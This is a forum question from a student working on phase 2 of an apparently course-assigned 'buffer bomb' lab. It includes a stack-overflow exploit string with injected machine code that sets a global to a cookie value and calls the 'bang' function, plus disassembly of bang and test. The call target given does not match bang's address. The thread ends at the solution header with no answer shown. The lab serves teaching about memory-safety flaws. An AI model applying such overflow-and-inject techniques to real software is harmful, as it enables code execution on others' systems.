
Buffer Bomb Phase 2

Assembly
ruevaughn asked:
Hey again! Think I almost got this one done... Here's my exploit string so far:

   0:   c7 05 dc a1 04 08 b7    movl   $0x779635b7,0x804a1dc
   7:   35 96 77
   a:   e8 5c 8d 04 08          call   0x8048d6b

779635b7 is my cookie, and 0x804a1dc is the global_value, and then I am calling bang... so I do not understand why this will not work.
I enter the exploit string as
01 02 03 04 05 ... 21 23 24 (the overflow starts after this point)  c7 05 dc a1 04 08 b7 35 96 77 e8 5c 8d 04 08.

Why am I getting a segmentation fault?

On a side note... Infinity, how did you learn this so well? Might as well get to know you a little :)

08048d60 <bang>:
 8048d60:	55                   	push   %ebp
 8048d61:	89 e5                	mov    %esp,%ebp
 8048d63:	83 ec 08             	sub    $0x8,%esp
 8048d66:	c7 04 24 02 00 00 00 	movl   $0x2,(%esp)
 8048d6d:	e8 2e fc ff ff       	call   80489a0 <entry_check>
 8048d72:	a1 dc a1 04 08       	mov    0x804a1dc,%eax
 8048d77:	3b 05 cc a1 04 08    	cmp    0x804a1cc,%eax
 8048d7d:	74 21                	je     8048da0 <bang+0x40>
 8048d7f:	89 44 24 04          	mov    %eax,0x4(%esp)
 8048d83:	c7 04 24 0f 9a 04 08 	movl   $0x8049a0f,(%esp)
 8048d8a:	e8 d5 f9 ff ff       	call   8048764 <printf@plt>
 8048d8f:	c7 04 24 00 00 00 00 	movl   $0x0,(%esp)
 8048d96:	e8 09 fa ff ff       	call   80487a4 <exit@plt>
 8048d9b:	90                   	nop    
 8048d9c:	8d 74 26 00          	lea    0x0(%esi),%esi
 8048da0:	89 44 24 04          	mov    %eax,0x4(%esp)
 8048da4:	c7 04 24 70 98 04 08 	movl   $0x8049870,(%esp)
 8048dab:	e8 b4 f9 ff ff       	call   8048764 <printf@plt>
 8048db0:	c7 04 24 02 00 00 00 	movl   $0x2,(%esp)
 8048db7:	e8 24 fd ff ff       	call   8048ae0 <validate>
 8048dbc:	eb d1                	jmp    8048d8f <bang+0x2f>
 8048dbe:	89 f6                	mov    %esi,%esi
------------------------------------------------------------------------------
08049000 <test>:
 8049000:	55                   	push   %ebp
 8049001:	89 e5                	mov    %esp,%ebp
 8049003:	83 ec 18             	sub    $0x18,%esp
 8049006:	c7 45 fc ef be ad de 	movl   $0xdeadbeef,-0x4(%ebp)
 804900d:	c7 04 24 03 00 00 00 	movl   $0x3,(%esp)
 8049014:	e8 87 f9 ff ff       	call   80489a0 <entry_check>
 8049019:	e8 c2 ff ff ff       	call   8048fe0 <getbuf>
 804901e:	89 c2                	mov    %eax,%edx
 8049020:	8b 45 fc             	mov    -0x4(%ebp),%eax
 8049023:	3d ef be ad de       	cmp    $0xdeadbeef,%eax
 8049028:	74 0e                	je     8049038 <test+0x38>
 804902a:	c7 04 24 b8 98 04 08 	movl   $0x80498b8,(%esp)
 8049031:	e8 de f6 ff ff       	call   8048714 <puts@plt>
 8049036:	c9                   	leave  
 8049037:	c3                   	ret    
 8049038:	3b 15 cc a1 04 08    	cmp    0x804a1cc,%edx
 804903e:	74 12                	je     8049052 <test+0x52>
 8049040:	89 54 24 04          	mov    %edx,0x4(%esp)
 8049044:	c7 04 24 9f 9a 04 08 	movl   $0x8049a9f,(%esp)
 804904b:	e8 14 f7 ff ff       	call   8048764 <printf@plt>
 8049050:	c9                   	leave  
 8049051:	c3                   	ret    
 8049052:	89 54 24 04          	mov    %edx,0x4(%esp)
 8049056:	c7 04 24 82 9a 04 08 	movl   $0x8049a82,(%esp)
 804905d:	e8 02 f7 ff ff       	call   8048764 <printf@plt>
 8049062:	c7 04 24 03 00 00 00 	movl   $0x3,(%esp)
 8049069:	e8 72 fa ff ff       	call   8048ae0 <validate>
 804906e:	c9                   	leave  
 804906f:	c3                   	ret
ASKER CERTIFIED SOLUTION
Infinity08 commented: